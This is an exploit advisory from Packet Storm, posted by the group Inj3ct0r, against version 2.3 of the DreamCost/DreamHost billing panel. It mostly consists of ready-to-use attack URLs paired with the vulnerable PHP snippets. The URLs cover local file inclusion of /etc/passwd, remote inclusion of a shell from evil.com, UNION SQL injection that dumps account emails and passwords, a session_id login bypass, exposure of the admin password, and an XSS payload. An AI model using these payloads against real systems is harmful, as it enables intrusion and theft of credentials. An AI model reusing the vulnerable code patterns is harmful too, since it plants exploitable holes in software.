DreamHost 2.3 SQL Injection / RFI / LFI / XSS

2009-08-28T00:00:00
ID PACKETSTORM:80753
Type packetstorm
Reporter Inj3ct0r
Modified 2009-08-28T00:00:00

Description

                                        
                                            `=================================================  
DreamHost <= && > 2.3 global inj3ct0r.com Exploit  
=================================================  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0   
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 0  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1  
  
#[+] Discovered By : Inj3ct0r  
#[+] Site : Inj3ct0r.com  
#[+] support e-mail : submit[at]inj3ct0r.com  
#[+] visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net  
  
Decided to make a review to DreamHost - Billing Panel  
Site product: dreamcost.com  
Version: <= && > 2.3  
  
----------------------------------------------------------------  
  
Local Include Exploit:  
  
/members.php?page=/../../../../../../../../../../etc/passwd%00  
  
  
Vulnerable code:  
  
// member_template.html   
<?   
include("member_$page.html");   
?>   
  
-----------------------------------------------------------------  
  
Remote Include Exploit:  
  
/admin/?page=http://evil.com/shell.php?  
  
Vulnerable code:  
  
// /admin/template.html   
include("$page$page_ext");   
  
------------------------------------------------------------------  
  
Sql Inj3ct0r Exploit:  
  
  
members.php?page=orders_view&order_id=-1'+UNION+SELECT+concat_ws(0x3,account_email,accoun t_password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28+FROM+account+WH ERE+account_id=1%20--%20&session_id=you session_id  
  
and  
  
members.php?page=orders_view&order_id=-1'+UNION+SELECT+concat_ws(0x3,account_email,accoun t_password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28+FROM+account+WH ERE+account_id=1%20--%20&session_id=-1'+OR+login_logged=0x59%20--%20  
  
Vulnerable code:  
  
// member_orders_view.html   
$db = new ps_DB;   
$q = "SELECT * FROM orders WHERE order_id='$order_id' AND order_account_id='$account_id' ORDER BY order_id";   
  
-------------------------------------------------------------  
  
Admin Login: members.php?Page=static&content=login  
Admin Password: members.php?Page=static&content=password  
Path: members.php?Page=static&content=path  
  
Vulnerable code:  
  
// member_static.thml   
<? echo setup($content);?>   
  
// functions.php   
function setup($field) {   
$db = new ps_DB;   
$q = "SELECT setup_$field FROM setup WHERE setup_id='1'";   
$db->query($q);   
$db->next_record();   
  
$ret = $db->f("setup_$field");   
return $ret;   
}   
$db->query($q);   
  
-------------------------------------------------------------  
  
SQL-Inj3ct0r entry under randomly Account  
  
members.php?page=account&session_id=-1'+OR+login_logged=0x59%20-%20  
  
Vulnerable code:  
  
  
// member_account.html   
$pass = is_logged($session_id);   
  
// functions.php   
function is_logged($session_id) {   
$db = new ps_DB;   
$q = "SELECT * FROM login WHERE login_id = '$session_id'";   
$db->query($q);   
$db->next_record();   
$ret = $db->f("login_logged");   
return $ret;   
}   
  
--------------------------------------------------------------  
  
Xss Exploit:  
  
/members.php?page=static&content=<script>alert('inj3ct0r.com')</script>  
  
  
---------------------------------  
  
ThE End =] Visit my proj3ct :  
  
http://inj3ct0r.com  
http://inj3ct0r.org  
http://inj3ct0r.net  
  
  
# ~ - [ [ : Inj3ct0r : ] ]`